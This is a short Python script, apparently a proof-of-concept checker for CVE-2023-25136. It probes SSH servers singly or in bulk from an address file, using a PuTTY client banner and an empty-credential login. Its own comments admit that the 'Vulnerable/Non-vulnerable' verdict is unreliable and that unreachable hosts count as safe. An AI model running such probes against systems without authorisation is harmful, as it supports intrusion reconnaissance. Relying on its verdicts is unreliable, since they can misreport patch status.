import paramiko
import socket
from termcolor import colored
import argparse
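class SSHVulnerabilityChecker:
    """Probe SSH servers with a fixed client identification string.

    The verdict is inferred only from whether the handshake and the
    empty-credential authentication attempt raise an exception.  Any
    connection failure (refused, timed out, unreachable) is therefore also
    printed as "Non-vulnerable".  Treat the output as a hint and confirm
    against the installed server version and the vendor advisory for the CVE.
    """

    def __init__(self, client_id):
        """Store the software part of the client banner.

        Args:
            client_id: text sent after "SSH-2.0-" in the client version line.
        """
        self.client_id = client_id

    def check_vulnerability(self, ip):
        """Connect to *ip* and print a coloured verdict line.

        Args:
            ip: target as "host" or "host:port"; the port defaults to 22.

        Raises:
            ValueError: if the port part of "host:port" is not an integer.
        """
        host, _, port_text = ip.partition(":")
        port = int(port_text) if port_text else 22
        sock = None
        transport = None
        try:
            # Open the socket ourselves so that the 1 s timeout also bounds
            # the TCP connect, not only the traffic after it.
            sock = socket.create_connection((host, port), timeout=1)
            transport = paramiko.Transport(sock)
            transport.local_version = f"SSH-2.0-{self.client_id}"
            transport.connect(username='', password='')
            print(colored(f"{ip}: Vulnerable", 'green'))
        except (socket.error, paramiko.AuthenticationException, paramiko.SSHException):
            # NOTE(review): this branch cannot tell a patched server from an
            # unreachable host, so it is a source of false negatives.
            print(colored(f"{ip}: Non-vulnerable", 'red'))
        finally:
            # Release the transport and the socket on every path; the original
            # closed them only after a successful connect.
            if transport is not None:
                transport.close()
            if sock is not None:
                sock.close()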
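if __name__ == '__main__':
    # Command-line entry point: check one address (-i) or every address
    # listed in a file (-f), one per line.
    print("*************************************************")
    print("* *")
    print("* POC of CVE-2023-25136 by adhkr *")
    print("* *")
    print("*************************************************")
    parser = argparse.ArgumentParser(description='Check SSH vulnerability on one or multiple IP addresses.')
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('-i', '--ip', metavar='IP_ADDRESS', help='IP address to test for vulnerability.')
    group.add_argument('-f', '--file', metavar='FILE_NAME', help='File name containing a list of IP addresses to test for vulnerability.')
    args = parser.parse_args()
    # Client identification string the checker presents to each server.
    client_id = "PuTTY_Release_0.64"
    checker = SSHVulnerabilityChecker(client_id)
    if args.ip:
        checker.check_vulnerability(args.ip)
    else:
        file_name = args.file
        with open(file_name, 'r') as f:
            for line in f:
                ip = line.strip()
                # Skip blank lines so an empty host is never probed and
                # reported with a misleading verdict.
                if not ip:
                    continue
                checker.check_vulnerability(ip)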